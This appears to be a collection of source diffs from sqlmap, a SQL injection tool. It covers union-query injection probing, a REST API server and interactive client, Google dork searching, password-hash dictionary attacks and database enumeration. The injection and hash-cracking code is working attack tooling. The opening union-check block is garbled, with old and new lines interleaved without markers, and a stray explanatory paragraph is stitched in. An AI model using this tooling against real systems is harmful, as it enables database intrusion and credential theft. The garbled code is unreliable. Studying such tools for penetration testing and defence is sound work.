vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False)
# Confirm that it is a full union SQL injection
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(charCount)
phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
if not all(_ in content for _ in (phrase, phrase2)):
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True)
elif not kb.unionDuplicates:
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
# Check for limited row output
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
# Confirm that it is a full union SQL injection
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
warnMsg = "output with limited number of rows detected. Switching to partial mode"
logger.warn(warnMsg)
vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()
if not all(_ in content for _ in (phrase, phrase2)):
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True)
elif not kb.unionDuplicates:
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
if unionErrorCase and count > 1:
warnMsg = "combined UNION/error-based SQL injection case found on "
warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
warnMsg += "column with better characteristics"
logger.warn(warnMsg)
else:
break
# Check for limited row output
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
warnMsg = "output with limited number of rows detected. Switching to partial mode"
logger.warn(warnMsg)
vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False)
unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()
if unionErrorCase and count > 1:
warnMsg = "combined UNION/error-based SQL injection case found on "
warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
warnMsg += "column with better characteristics"
logger.warn(warnMsg)
else:
break
return validPayload, vector
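
The reshuffled block above now runs the per-column probing at most twice: first with a random marker four times UNION_MIN_RESPONSE_CHARS long, then, only if no vector was found, with the minimum length. A stripped-down sketch of that control flow; probe() is a hypothetical stand-in for the forge-request-and-check logic, and the constant value is illustrative only:

# Sketch of the two-pass marker-length strategy (probe() returns a vector or None).
UNION_MIN_RESPONSE_CHARS = 10  # hypothetical value for the sketch

def find_vector(positions, probe):
    vector = None
    for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
        if vector:
            break
        for position in positions:
            vector = probe(position, charCount)
            if vector:
                break
    return vector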

View File

@ -8,11 +8,16 @@ See the file 'doc/COPYING' for copying permission
import logging
import os
import re
import shlex
import sqlite3
import sys
import tempfile
import time
import urllib2
from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
from lib.core.common import unArrayizeValue
from lib.core.convert import base64pickle
from lib.core.convert import hexencode
@ -31,6 +36,7 @@ from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict
from lib.core.settings import IS_WIN
from lib.core.subprocessng import Popen
from lib.parse.cmdline import cmdLineParser
from thirdparty.bottle.bottle import error as return_error
from thirdparty.bottle.bottle import get
from thirdparty.bottle.bottle import hook
@ -82,7 +88,7 @@ class Database(object):
else:
self.cursor.execute(statement)
except sqlite3.OperationalError, ex:
if not "locked" in ex.message:
if not "locked" in getSafeExString(ex):
raise
else:
break
@ -110,7 +116,8 @@ class Database(object):
class Task(object):
def __init__(self, taskid):
def __init__(self, taskid, remote_addr):
self.remote_addr = remote_addr
self.process = None
self.output_directory = None
self.options = None
@ -152,8 +159,10 @@ class Task(object):
self.options = AttribDict(self._original_options)
def engine_start(self):
self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)],
shell=False, close_fds=not IS_WIN)
if os.path.exists("sqlmap.py"):
self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN)
else:
self.process = Popen(["sqlmap", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN)
def engine_stop(self):
if self.process:
@ -335,7 +344,9 @@ def task_new():
Create new task ID
"""
taskid = hexencode(os.urandom(8))
DataStore.tasks[taskid] = Task(taskid)
remote_addr = request.remote_addr
DataStore.tasks[taskid] = Task(taskid, remote_addr)
logger.debug("Created new task: '%s'" % taskid)
return jsonize({"success": True, "taskid": taskid})
@ -361,18 +372,18 @@ def task_delete(taskid):
@get("/admin/<taskid>/list")
def task_list(taskid):
def task_list(taskid=None):
"""
List task pool
"""
if is_admin(taskid):
logger.debug("[%s] Listed task pool" % taskid)
tasks = list(DataStore.tasks)
return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)})
else:
logger.warning("[%s] Unauthorized call to task_list()" % taskid)
return jsonize({"success": False, "message": "Unauthorized"})
tasks = {}
for key in DataStore.tasks:
if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr:
tasks[key] = dejsonize(scan_status(key))["status"]
logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr))
return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)})
@get("/admin/<taskid>/flush")
def task_flush(taskid):
@ -381,11 +392,13 @@ def task_flush(taskid):
"""
if is_admin(taskid):
DataStore.tasks = dict()
logger.debug("[%s] Flushed task pool" % taskid)
return jsonize({"success": True})
else:
logger.warning("[%s] Unauthorized call to task_flush()" % taskid)
return jsonize({"success": False, "message": "Unauthorized"})
for key in list(DataStore.tasks):
if DataStore.tasks[key].remote_addr == request.remote_addr:
del DataStore.tasks[key]
logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr))
return jsonize({"success": True})
##################################
# sqlmap core interact functions #
@ -467,7 +480,9 @@ def scan_stop(taskid):
"""
Stop a scan
"""
if taskid not in DataStore.tasks:
if (taskid not in DataStore.tasks or
DataStore.tasks[taskid].engine_process() is None or
DataStore.tasks[taskid].engine_has_terminated()):
logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
@ -482,7 +497,9 @@ def scan_kill(taskid):
"""
Kill a scan
"""
if taskid not in DataStore.tasks:
if (taskid not in DataStore.tasks or
DataStore.tasks[taskid].engine_process() is None or
DataStore.tasks[taskid].engine_has_terminated()):
logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
@ -552,7 +569,7 @@ def scan_log_limited(taskid, start, end):
json_log_messages = list()
if taskid not in DataStore.tasks:
logger.warning("[%s] Invalid task ID provided to scan_log_limited()")
logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
if not start.isdigit() or not end.isdigit() or end < start:
@ -581,7 +598,7 @@ def scan_log(taskid):
json_log_messages = list()
if taskid not in DataStore.tasks:
logger.warning("[%s] Invalid task ID provided to scan_log()")
logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
# Read all log messages from the IPC database
@ -640,6 +657,22 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT):
run(host=host, port=port, quiet=True, debug=False)
def _client(url, options=None):
logger.debug("Calling %s" % url)
try:
data = None
if options is not None:
data = jsonize(options)
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
response = urllib2.urlopen(req)
text = response.read()
except:
if options:
logger.error("Failed to load and parse %s" % url)
raise
return text
def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT):
"""
REST-JSON API client
@ -647,11 +680,106 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT):
addr = "http://%s:%d" % (host, port)
logger.info("Starting REST-JSON API client to '%s'..." % addr)
# TODO: write a simple client with requests, for now use curl from command line
logger.error("Not yet implemented, use curl from command line instead for now, for example:")
print "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port)
print ("\t$ curl -H \"Content-Type: application/json\" "
"-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' "
"http://%s:%d/scan/$taskid/start") % (host, port)
print "\t$ curl http://%s:%d/scan/$taskid/data" % (host, port)
print "\t$ curl http://%s:%d/scan/$taskid/log\n" % (host, port)
try:
_client(addr)
except Exception, ex:
if not isinstance(ex, urllib2.HTTPError):
errMsg = "there has been a problem while connecting to the "
errMsg += "REST-JSON API server at '%s' " % addr
errMsg += "(%s)" % ex
logger.critical(errMsg)
return
taskid = None
logger.info("Type 'help' or '?' for list of available commands")
while True:
try:
command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip().lower()
except (EOFError, KeyboardInterrupt):
print
break
if command in ("data", "log", "status", "stop", "kill"):
if not taskid:
logger.error("No task ID in use")
continue
raw = _client("%s/scan/%s/%s" % (addr, taskid, command))
res = dejsonize(raw)
if not res["success"]:
logger.error("Failed to execute command %s" % command)
dataToStdout("%s\n" % raw)
elif command.startswith("new"):
if ' ' not in command:
logger.error("Program arguments are missing")
continue
argv = ["sqlmap.py"] + shlex.split(command)[1:]
try:
cmdLineOptions = cmdLineParser(argv).__dict__
except:
taskid = None
continue
for key in list(cmdLineOptions):
if cmdLineOptions[key] is None:
del cmdLineOptions[key]
raw = _client("%s/task/new" % addr)
res = dejsonize(raw)
if not res["success"]:
logger.error("Failed to create new task")
continue
taskid = res["taskid"]
logger.info("New task ID is '%s'" % taskid)
raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions)
res = dejsonize(raw)
if not res["success"]:
logger.error("Failed to start scan")
continue
logger.info("Scanning started")
elif command.startswith("use"):
taskid = (command.split()[1] if ' ' in command else "").strip("'\"")
if not taskid:
logger.error("Task ID is missing")
taskid = None
continue
elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid):
logger.error("Invalid task ID '%s'" % taskid)
taskid = None
continue
logger.info("Switching to task ID '%s' " % taskid)
elif command in ("list", "flush"):
raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command))
res = dejsonize(raw)
if not res["success"]:
logger.error("Failed to execute command %s" % command)
elif command == "flush":
taskid = None
dataToStdout("%s\n" % raw)
elif command in ("exit", "bye", "quit", 'q'):
return
elif command in ("help", "?"):
msg = "help Show this help message\n"
msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n"
msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n"
msg += "data Retrieve and show data for current task\n"
msg += "log Retrieve and show log for current task\n"
msg += "status Retrieve and show status for current task\n"
msg += "stop Stop current task\n"
msg += "kill Kill current task\n"
msg += "list Display all tasks\n"
msg += "flush Flush tasks (delete all tasks)\n"
msg += "exit Exit this client\n"
dataToStdout(msg)
elif command:
logger.error("Unknown command '%s'" % command)

View File

@ -22,6 +22,7 @@ from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapSyntaxException
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
from lib.core.threads import getCurrentThreadData
from lib.core.threads import runThreads
@ -58,12 +59,15 @@ def crawl(target):
try:
if current:
content = Request.getPage(url=current, crawling=True, raise404=False)[0]
except SqlmapConnectionException, e:
errMsg = "connection exception detected (%s). skipping " % e
except SqlmapConnectionException, ex:
errMsg = "connection exception detected (%s). skipping " % ex
errMsg += "URL '%s'" % current
logger.critical(errMsg)
except httplib.InvalidURL, e:
errMsg = "invalid URL detected (%s). skipping " % e
except SqlmapSyntaxException:
errMsg = "invalid URL detected. skipping '%s'" % current
logger.critical(errMsg)
except httplib.InvalidURL, ex:
errMsg = "invalid URL detected (%s). skipping " % ex
errMsg += "URL '%s'" % current
logger.critical(errMsg)

View File

@ -12,6 +12,7 @@ import socket
import urllib
import urllib2
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import readInput
from lib.core.common import urlencode
@ -30,6 +31,8 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import UNICODE_ENCODING
from lib.request.basic import decodePage
from lib.request.httpshandler import HTTPSHandler
from thirdparty.socks import socks
class Google(object):
"""
@ -47,10 +50,10 @@ class Google(object):
self.opener.addheaders = conf.httpHeaders
try:
conn = self.opener.open("http://www.google.com/ncr")
conn = self.opener.open("https://www.google.com/ncr")
conn.info() # retrieve session cookie
except Exception, ex:
errMsg = "unable to connect to Google ('%s')" % ex
errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex)
raise SqlmapConnectionException(errMsg)
def search(self, dork):
@ -65,7 +68,7 @@ class Google(object):
if not dork:
return None
url = "http://www.google.com/search?"
url = "https://www.google.com/search?"
url += "q=%s&" % urlencode(dork, convall=True)
url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search"
url += "&start=%d" % ((gpage - 1) * 100)
@ -94,12 +97,12 @@ class Google(object):
except urllib2.HTTPError, e:
try:
page = e.read()
except socket.timeout:
warnMsg = "connection timed out while trying "
warnMsg += "to get error page information (%d)" % e.code
except Exception, ex:
warnMsg = "problem occurred while trying to get "
warnMsg += "an error page information (%s)" % getSafeExString(ex)
logger.critical(warnMsg)
return None
except (urllib2.URLError, httplib.error, socket.error, socket.timeout):
except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError):
errMsg = "unable to connect to Google"
raise SqlmapConnectionException(errMsg)
@ -175,3 +178,6 @@ class Google(object):
retVal = [urllib.unquote(match.group(1)) for match in re.finditer(regex, page, re.I | re.S)]
return retVal
def setHTTPProxy(): # Cross-linked function
raise NotImplementedError

View File

@ -44,6 +44,7 @@ from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import getFileItems
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import normalizeUnicode
@ -326,8 +327,10 @@ def wordpress_passwd(password, salt, count, prefix, uppercase=False):
return output
password = password.encode(UNICODE_ENCODING)
cipher = md5(salt)
cipher.update(password.encode(UNICODE_ENCODING))
cipher.update(password)
hash_ = cipher.digest()
for i in xrange(count):
@ -706,14 +709,18 @@ def dictionaryAttack(attack_dict):
item = [(user, hash_), {}]
elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES):
item = [(user, hash_), {'username': user}]
elif hash_regex in (HASH.ORACLE):
elif hash_regex in (HASH.ORACLE,):
item = [(user, hash_), {'salt': hash_[-20:]}]
elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW):
item = [(user, hash_), {'salt': hash_[6:14]}]
elif hash_regex in (HASH.CRYPT_GENERIC):
elif hash_regex in (HASH.CRYPT_GENERIC,):
item = [(user, hash_), {'salt': hash_[0:2]}]
elif hash_regex in (HASH.WORDPRESS):
item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}]
elif hash_regex in (HASH.WORDPRESS,):
if ITOA64.index(hash_[3]) < 32:
item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}]
else:
warnMsg = "invalid hash '%s'" % hash_
logger.warn(warnMsg)
if item and hash_ not in keys:
resumed = hashDBRetrieve(hash_)
@ -771,7 +778,7 @@ def dictionaryAttack(attack_dict):
except Exception, ex:
warnMsg = "there was a problem while loading dictionaries"
warnMsg += " ('%s')" % ex.message
warnMsg += " ('%s')" % getSafeExString(ex)
logger.critical(warnMsg)
message = "do you want to use common password suffixes? (slow!) [y/N] "

View File

@ -11,6 +11,7 @@ import sqlite3
import threading
import time
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import serializeObject
from lib.core.common import unserializeObject
@ -77,7 +78,7 @@ class HashDB(object):
for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)):
retVal = row[0]
except sqlite3.OperationalError, ex:
if not "locked" in ex.message:
if not "locked" in getSafeExString(ex):
raise
except sqlite3.DatabaseError, ex:
errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, ex)
@ -127,7 +128,7 @@ class HashDB(object):
if retries == 0:
warnMsg = "there has been a problem while writing to "
warnMsg += "the session file ('%s')" % ex.message
warnMsg += "the session file ('%s')" % getSafeExString(ex)
logger.warn(warnMsg)
if retries >= HASHDB_FLUSH_RETRIES:

View File

@ -12,6 +12,7 @@ from lib.core.data import logger
from lib.core.data import queries
from lib.core.common import Backend
from lib.core.common import unArrayizeValue
from lib.core.settings import HSQLDB_DEFAULT_SCHEMA
from lib.request import inject
class Enumeration(GenericEnumeration):
@ -40,3 +41,6 @@ class Enumeration(GenericEnumeration):
def getHostname(self):
warnMsg = "on HSQLDB it is not possible to enumerate the hostname"
logger.warn(warnMsg)
def getCurrentDb(self):
return HSQLDB_DEFAULT_SCHEMA

View File

@ -152,7 +152,7 @@ class Enumeration(GenericEnumeration):
warnMsg += "for database '%s'" % db
logger.warn(warnMsg)
if not kb.data.cachedTables:
if not kb.data.cachedTables and not conf.search:
errMsg = "unable to retrieve the tables for any database"
raise SqlmapNoneDataException(errMsg)
else:
@ -184,7 +184,7 @@ class Enumeration(GenericEnumeration):
infoMsg = "searching table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.info(infoMsg)
@ -217,7 +217,7 @@ class Enumeration(GenericEnumeration):
else:
infoMsg = "fetching number of table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db))
logger.info(infoMsg)
@ -229,7 +229,7 @@ class Enumeration(GenericEnumeration):
if not isNumPosStrValue(count):
warnMsg = "no table"
if tblConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db)
logger.warn(warnMsg)
@ -295,7 +295,7 @@ class Enumeration(GenericEnumeration):
infoMsg = "searching column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
foundCols[column] = {}
@ -336,7 +336,7 @@ class Enumeration(GenericEnumeration):
values = [values]
for foundTbl in values:
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True)
if foundTbl is None:
continue
@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration):
infoMsg = "fetching number of tables containing column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s' in database '%s'" % (column, db)
logger.info("%s%s" % (infoMsg, infoMsgTbl))
@ -380,7 +380,7 @@ class Enumeration(GenericEnumeration):
if not isNumPosStrValue(count):
warnMsg = "no tables contain column"
if colConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' " % column
warnMsg += "in database '%s'" % db
logger.warn(warnMsg)

View File

@ -169,7 +169,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "confirming %s" % DBMS.MYSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("USER() LIKE USER()")
result = inject.checkBooleanExpression("SESSION_USER() LIKE USER()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL

View File

@ -358,7 +358,7 @@ class Databases:
if bruteForce is None:
logger.error(errMsg)
return self.getTables(bruteForce=True)
else:
elif not conf.search:
raise SqlmapNoneDataException(errMsg)
else:
for db, tables in kb.data.cachedTables.items():
@ -370,7 +370,7 @@ class Databases:
return kb.data.cachedTables
def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None):
def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False):
self.forceDbmsEnum()
if conf.db is None or conf.db == CURRENT_DB:
@ -415,7 +415,7 @@ class Databases:
colList = filter(None, colList)
if conf.tbl:
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB):
conf.tbl = conf.tbl.upper()
tblList = conf.tbl.split(",")
@ -432,10 +432,12 @@ class Databases:
tblList = tblList[0]
tblList = list(tblList)
else:
elif not conf.search:
errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise SqlmapNoneDataException(errMsg)
else:
return kb.data.cachedColumns
tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList))
@ -509,7 +511,7 @@ class Databases:
if len(colList) > 0:
if colTuple:
_, colCondParam = colTuple
infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
else:
colCondParam = "='%s'"
infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
@ -517,10 +519,6 @@ class Databases:
condQueryStr = "%%s%s" % colCondParam
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))
infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
@ -534,7 +532,14 @@ class Databases:
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
query = rootQuery.inband.query % tbl
values = inject.getValue(query, blind=False, time=False)
if dumpMode and colList:
values = [(_,) for _ in colList]
else:
infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
values = inject.getValue(query, blind=False, time=False)
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
index, values = 1, []
@ -604,7 +609,7 @@ class Databases:
if len(colList) > 0:
if colTuple:
_, colCondParam = colTuple
infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
else:
colCondParam = "='%s'"
infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
@ -612,10 +617,6 @@ class Databases:
condQueryStr = "%%s%s" % colCondParam
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))
infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
@ -639,32 +640,41 @@ class Databases:
parseSqliteTableSchema(value)
return kb.data.cachedColumns
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
table = {}
columns = {}
if not isNumPosStrValue(count):
if Backend.isDbms(DBMS.MSSQL):
count, index, values = 0, 1, []
while True:
query = rootQuery.blind.query3 % (conf.db, tbl, index)
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
if isNoneValue(value) or value == " ":
break
else:
columns[safeSQLIdentificatorNaming(value)] = None
index += 1
if dumpMode and colList:
count = 0
for value in colList:
columns[safeSQLIdentificatorNaming(value)] = None
else:
infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
if not columns:
errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "")
errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.error(errMsg)
continue
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
if Backend.isDbms(DBMS.MSSQL):
count, index, values = 0, 1, []
while True:
query = rootQuery.blind.query3 % (conf.db, tbl, index)
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
if isNoneValue(value) or value == " ":
break
else:
columns[safeSQLIdentificatorNaming(value)] = None
index += 1
if not columns:
errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "")
errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.error(errMsg)
continue
for index in getLimitRange(count):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
field = None
@ -805,7 +815,7 @@ class Databases:
elif "." in conf.tbl:
if not conf.db:
conf.db, conf.tbl = conf.tbl.split(".")
conf.db, conf.tbl = conf.tbl.split('.', 1)
if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
warnMsg = "missing database parameter. sqlmap is going to "

View File

@ -12,6 +12,7 @@ from lib.core.bigarray import BigArray
from lib.core.common import Backend
from lib.core.common import clearConsoleLine
from lib.core.common import getLimitRange
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import isInferenceAvailable
from lib.core.common import isListLike
@ -88,10 +89,12 @@ class Entries:
if isinstance(tblList[0], (set, tuple, list)):
tblList = tblList[0]
else:
elif not conf.search:
errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise SqlmapNoneDataException(errMsg)
else:
return
for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
@ -102,7 +105,7 @@ class Entries:
if foundData is None:
kb.data.cachedColumns = {}
self.getColumns(onlyColNames=True)
self.getColumns(onlyColNames=True, dumpMode=True)
else:
kb.data.cachedColumns = foundData
@ -272,7 +275,7 @@ class Entries:
else:
emptyColumns = []
plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2)
indexRange = getLimitRange(count, dump=True, plusOne=plusOne)
indexRange = getLimitRange(count, plusOne=plusOne)
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
for column in colList:
@ -293,7 +296,7 @@ class Entries:
if column not in entries:
entries[column] = BigArray()
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column),
